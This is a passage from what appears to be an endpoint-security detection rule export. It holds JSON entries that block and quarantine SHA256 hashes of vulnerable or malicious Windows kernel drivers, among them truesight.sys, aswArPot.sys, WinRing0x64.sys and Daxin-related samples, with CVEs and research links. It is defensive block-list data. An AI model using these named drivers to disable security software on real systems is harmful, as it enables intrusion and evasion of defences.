"e3cff3b8a356b80eda5fd748c23691dd711b2d6553ff373e43dd4025b40b0ad5", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "7824f082-58f7-5f3a-ad77-d557d2a4bc99", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + 
"last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.809544Z", + "creation_date": "2026-03-23T11:45:31.809547Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.809555Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "771b9b964d2e3d7a6743d28371622c14d6dd695ac5cc6a1b16449415608f50a7", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "782a2e1c-0cc5-594a-bd9f-7e20daa50099", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:32.144577Z", + "creation_date": "2026-03-23T11:45:32.144580Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:32.144585Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "966cc215b2b8eb69aab3393114a10b7e07ba83df5b2587cb47fd3b172a3fa7cb", + "comment": "Malicious Kernel Driver (aka driver_312c83a9.sys) 
[https://www.loldrivers.io/drivers/495f0f36-c5e0-467d-8115-b5bdbe7ff686/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "7830904f-3bea-5bd3-b2a1-0670d96b8abd", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.815832Z", + "creation_date": "2026-03-23T11:45:31.815834Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.815840Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "7d15fdcd606dc03b61badd7cacba1a62ddab3aa5acc174bc4b3573beec377591", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "784639c3-8701-54cc-87a4-4514b6953fc5", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.828459Z", + "creation_date": 
"2026-03-23T11:45:31.828461Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.828467Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "045365894e5d26b620eff819cce3f823e114f7b25ed1cd50b870bf81444bbe8c", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "7846edc1-3f02-5bd5-b92f-8ebae75947fa", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.155632Z", + "creation_date": "2026-03-23T11:45:31.155634Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.155639Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "4f0a2ac804c356a80313aa31dcc9c486cfd9078df64b65017d74be395d6cb9ec", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ 
+ "id": "784c165f-1e92-52c6-bd1e-108bd18b4df6", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.975913Z", + "creation_date": "2026-03-23T11:45:29.975915Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.975921Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "2ff09bb919a9909068166c30322c4e904befeba5429e9a11d011297fb8a73c07", + "comment": "Gigabyte vulnerable driver (aka GVCIDrv64.sys) [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "78595590-0f19-5b92-bf1a-74742f1f44f4", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.977916Z", + "creation_date": "2026-03-23T11:45:29.977919Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": 
true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.977924Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a8c558e74ebe35a095a5b79d4bb26c10b18f8ebb449365e742f856d4e032555c", + "comment": "Malicious Kernel Driver (aka daxin_blank6.sys) [https://www.loldrivers.io/drivers/3d1439e9-9a7d-497a-8c6c-74513f825d6a/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "785dbe37-862e-5e72-a198-c01f0b51e93a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.816935Z", + "creation_date": "2026-03-23T11:45:31.816939Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.816955Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "001bdb1e584eede0b46a7fb21e678303e2370b2b176ecd7bba803d0afc2b244c", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "78685f2a-35d1-5a09-bdee-24c61ed9963c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + 
"effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.831145Z", + "creation_date": "2026-03-23T11:45:30.831147Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.831152Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "f8a387b02f003e7a45f5e4a99fe2a52dc239e6e7f77383eb97e477ace0808f79", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "786d4b1a-9a1f-550b-943a-037be644c7ec", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.979709Z", + "creation_date": "2026-03-23T11:45:29.979711Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.979716Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + 
"references": [], + "type": "hash", + "value": "dd759c6b9c4222c7b19e8b0ba7288d7395594d6884b9bcdf0ccfada3e6b7a8d5", + "comment": "Malicious Kernel Driver (aka windbg.sys) [https://www.loldrivers.io/drivers/da7314dc-6cf1-4d74-a0d1-796fc08944f8/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "7874a311-e4b6-538d-acdc-63f401b6d801", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.818399Z", + "creation_date": "2026-03-23T11:45:30.818401Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.818406Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "065a34b786b0ccf6f88c136408943c3d2bd3da14357ee1e55e81e05d67a4c9bc", + "comment": "Vulnerable Kernel Driver (aka kerneld.amd64) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "787e30d4-7582-5d2f-b193-c77fa09b8ddd", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": 
"system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.969116Z", + "creation_date": "2026-03-23T11:45:29.969118Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.969123Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "17687cba00ec2c9036dd3cb5430aa1f4851e64990dafb4c8f06d88de5283d6ca", + "comment": "Avast Vulnerable Driver (aka aswArPot.sys) [CVE-2022-26522, CVE-2022-26523] [https://www.mandiant.com/resources/blog/unc2596-cuba-ransomware] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "7888a8d3-bdd8-533b-b862-c33714323e6f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.453343Z", + "creation_date": "2026-03-23T11:45:30.453346Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.453355Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "84739539aa6a9c9cb3c48c53f9399742883f17f24e081ebfa7bfaaf59f3ed451", + "comment": "Vulnerable Kernel Driver (aka nicm.sys) [https://www.loldrivers.io/drivers/86cff0de-2536-4b8d-a846-a7312c569597/] [file SHA256]", + "source": 
"af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "788cc8a2-8204-5039-99d8-10fa825d98ce", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:32.146601Z", + "creation_date": "2026-03-23T11:45:32.146603Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:32.146608Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "1df739ca8e7763776f84b421c7859fccb2fbfd47cf27f9980f646597f5ae7836", + "comment": "Malicious Kernel Driver (aka driver_89036534.sys) [https://www.loldrivers.io/drivers/750a8aa9-a87c-4142-b96b-18ea139ada14/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "789a395a-0cbc-5aa1-ac63-97d2ec542285", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.812756Z", + "creation_date": "2026-03-23T11:45:31.812759Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": 
"stable", + "hl_testing_start_time": "2026-03-23T11:45:31.812767Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "01ac08508f5e8224d00cee894d551ba032fb0c4f72addba4154b6d1fc710a25b", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "78a649d6-5538-51fd-b671-49800400722b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.974783Z", + "creation_date": "2026-03-23T11:45:29.974785Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.974791Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "6bdf465db8860c80051d4d1b9db1c3153ab65c252f9500b85efc56d255b4cb1d", + "comment": "Trend Micro Anti-Rootkit Common Module vulnerable driver (aka TmComm.sys) [CVE-2007-0856] [https://www.loldrivers.io/drivers/22aa985b-5fdb-4e38-9382-a496220c27ec/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "78aeb5c2-d17d-5edc-889a-d5eb1ba8c4e3", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + 
"global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.980993Z", + "creation_date": "2026-03-23T11:45:29.980995Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.981065Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e89afd283d5789b8064d5487e04b97e2cd3fc0c711a8cec230543ebdf9ffc534", + "comment": "Vulnerable Kernel Driver (aka BEDAISY.SYS) [https://www.loldrivers.io/drivers/db666d40-c9fa-4039-bfac-a5d7afd61b67/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "78c0cf7d-5d08-501e-9259-31f7b1ca041b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.614614Z", + "creation_date": "2026-03-23T11:45:29.614616Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.614621Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": 
"hash", + "value": "5d530e111400785d183057113d70623e17af32931668ab7c7fc826f0fd4f91a3", + "comment": "MICRO-STAR vulnerable drivers (aka NBIOLib_X64.sys, NTIOLib_X64.sys, NTIOLib.sys and NBIOLib.sys) [CVE-2021-44899] [http://blog.rewolf.pl/blog/?p=1630] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "78c61919-9a0b-5031-8ba3-43d90e666e9f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.159849Z", + "creation_date": "2026-03-23T11:45:31.159852Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.159858Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "bc97e34326627da82b7c070491e018890190ad14224b153c4fca107eca0ff998", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "78cebc51-b13f-57fc-8f28-f657eeef5792", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + 
"last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.825540Z", + "creation_date": "2026-03-23T11:45:30.825542Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.825548Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "314d5dbb5fcd4feb7560a129fc7167718d59e11c40586f2342e03a282910ec2e", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "78d60d9b-5b21-549c-952b-0eb293816811", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.617272Z", + "creation_date": "2026-03-23T11:45:29.617274Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.617279Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "9305f0834e67aa16fb252bd30927e5f835639ef4b868f20d232260edffefd6f0", + "comment": "Noriyuki MIYAZAKI's WinRing0 dangerous driver (aka WinRing0x64.sys) 
[CVE-2020-14979] [https://www.loldrivers.io/drivers/f0fd5bc6-9ebd-4eb0-93ce-9256a5b9abf9/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "78de01de-0931-5b75-a54a-ed0d0908936a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.835176Z", + "creation_date": "2026-03-23T11:45:30.835179Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.835189Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "5f37c74b4ef7804653d9c1aa12237c3b01caa297544db5e0b4cdb90e5f5a8be8", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "78e444a6-050d-5276-88c2-f959ba6f201d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.156904Z", + 
"creation_date": "2026-03-23T11:45:31.156906Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.156911Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "5bfc2787dc5265a1c260409f6c42639c7aeed978924f4924f7c695083b184c30", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "78ef95d4-b94a-55a1-b9c8-753438d31203", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.605267Z", + "creation_date": "2026-03-23T11:45:29.605269Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.605274Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "594b3e2ce945a7db3a16ef23da39997ddc12337266ecf8ad326ffcf2c4ee1bc8", + "comment": "Process Hacker driver (aka kprocesshacker.sys) [https://processhacker.sourceforge.io/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "78f2a00f-f06c-595a-bb4c-28577e09d7ca", + 
